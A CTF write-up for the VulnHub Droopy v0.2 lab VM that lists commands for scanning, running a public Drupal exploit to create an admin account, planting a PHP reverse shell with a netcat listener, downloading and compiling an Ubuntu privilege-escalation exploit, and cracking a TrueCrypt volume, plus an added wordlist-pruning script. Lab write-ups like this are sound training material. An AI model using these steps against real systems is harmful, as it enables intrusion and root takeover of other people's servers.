[VIDEO] Droopy: v0.2 CTF Solution

Posted in Security Videos


This video demonstrates how I solved the vulnhub Droopy v0.2 CTF challenge.

Steps

  • Use Netdiscover to get the IP address of our target (Reconnaissance)
  • Use Nmap to do a detailed scan of the target (Information Gathering)
  • Use a publicly available Drupal exploit to create an admin account (Gaining Access)
  • Upload a reverse connect script which will open an outbound TCP connection from the webserver to your host (Remote Access)
  • Use an Ubuntu local privilege escalation exploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.126.130
nmap -sS 192.168.126.136
Launch Firefox -> 192.168.126.136
Visit 192.168.126.136/CHANGELOG.txt
Search exploit-db.com for Drupal 7.3
Download exploit 34992
Save as dru.py
python dru.py -t http://192.168.126.136 -u InfosecShinobi -p password1234
Login to 192.168.126.130 via the web browser
Visit Drupal's Modules page
Enable "PHP filter"
Save
Visit Drupal's configuration page
Click on "PHP Code"
Configure
Select administrator, authenticated user and anonymous user
Save configuration
Add content
Change text format to "php code"
Download php-reverse-shell.php
Edit php-reverse-shell.php
Put in your IP and a listening port i.e. 4445
Open your kali terminal
nc -lvvp 4445
Go back to browser
Copy and paste your edited php-reverse-shell code into the "add content" area of drupal
Save // you automatically get a shell on the listener
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
uname -a && cat /etc/issue
whoami
Launch browser
Search exploit-db for Ubuntu 14.04
Use exploit 37292
Save as over2.c
wget 192.168.126.130/over2.c
chmod +x over2.c
gcc over2.c
gcc over2.c -o over2
./over2
whoami && id
Gameover

Getting the Flag

**I stopped recording my screen immediately after I got root – so you won't see this part in the video above.**

After gaining root, I looted the Droopy VM and then found that there was something interesting in /var/mail/www-data

From Dave  Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave 
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

There seems to be an encrypted file somewhere waiting to be found :). I eventually found a TrueCrypt file, dave.tc, in the /root directory.

I tried cracking this truecrypt file using the truecrack tool "truecrack -t dave.tc -w r0cky0u.txt -v", and it took me some hours to realise there might just be a more efficient way to do this.

I went back to my hint again, and then it struck me – "we know what academy we went to". So yeah, grep to the rescue: "grep -n "academy" r0cky0u.txt > academy.txt". With this, I got a new wordlist containing only the words that include "academy".

Then I ran this in my terminal "truecrack -t dave.tc -w academy.txt -v" and I got the password after some minutes – "etonacademy".
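The mail hint actually gives two constraints, not one: the password contains something about an academy, and it is no longer than 11 characters. The grep above applies only the first. The script below is an added example (not part of the original post and not the truecrack tool) that applies both constraints to a wordlist before the slow volume-cracking step runs, which is the general version of the pruning the post does by hand. The wordlist inside it is constructed for the example and stands in for r0cky0u.txt; the `must_contain` and `max_len` names are this example's own.

```python
"""Prune a password wordlist using the constraints stated in a hint.

Added example for this walkthrough; not code from the original post.
The hint in the mail gives two constraints: the password is at most
11 characters long and relates to an academy. The post's grep keeps
only the second; this script applies both so that fewer candidates
reach the slow cracking step.
"""
import sys

# Constructed sample wordlist standing in for r0cky0u.txt (not real data).
SAMPLE_WORDLIST = """\
password1234
etonacademy
academyofmusic
westpointacademy
navalacademy
academy
starfleetacademy99
academy2016
"""


def filter_candidates(lines, must_contain="academy", max_len=11):
    """Yield words that contain the hint substring and fit the length limit.

    Both parameters are this example's own names: must_contain is the
    substring taken from the hint, max_len the stated maximum length.
    The comparison is case-insensitive because wordlists mix cases.
    """
    needle = must_contain.lower()
    for raw in lines:
        word = raw.rstrip("\r\n")
        if not word:
            continue  # skip blank lines
        if len(word) > max_len:
            continue  # too long to be the password according to the hint
        if needle not in word.lower():
            continue  # does not match the "academy" hint
        yield word


def prune_wordlist(text, must_contain="academy", max_len=11):
    """Return the pruned candidate list for a wordlist given as one string."""
    return list(filter_candidates(text.splitlines(), must_contain, max_len))


if __name__ == "__main__":
    # Usage: python prune.py wordlist.txt > academy.txt
    # With no argument the constructed sample list is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
            candidates = list(filter_candidates(fh))
    else:
        candidates = prune_wordlist(SAMPLE_WORDLIST)
    for candidate in candidates:
        print(candidate)
```

On the constructed list this keeps only etonacademy, academy and academy2016; the other academy entries are dropped because they exceed 11 characters, which is exactly the class of candidates the grep alone would still have fed to truecrack.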

I mounted this using VeraCrypt, put in the password "etonacademy" and found flag.txt inside the mounted volume at /.secret/.top

Notes

  • First Song – Enya – Wild Child
  • Second Song – Sir Victor Uwaifo – Joromi
  • Third Song – Kiss Daniel – Are you alright
  • Video Length – 10 minutes

Conclusion

Thanks to the team at VulnHub for hosting this CTF challenge. The challenge was fun, and I learnt new things like using truecrack to crack a TrueCrypt volume.

Kindly use the comment box below for feedback

– InfosecShinobi
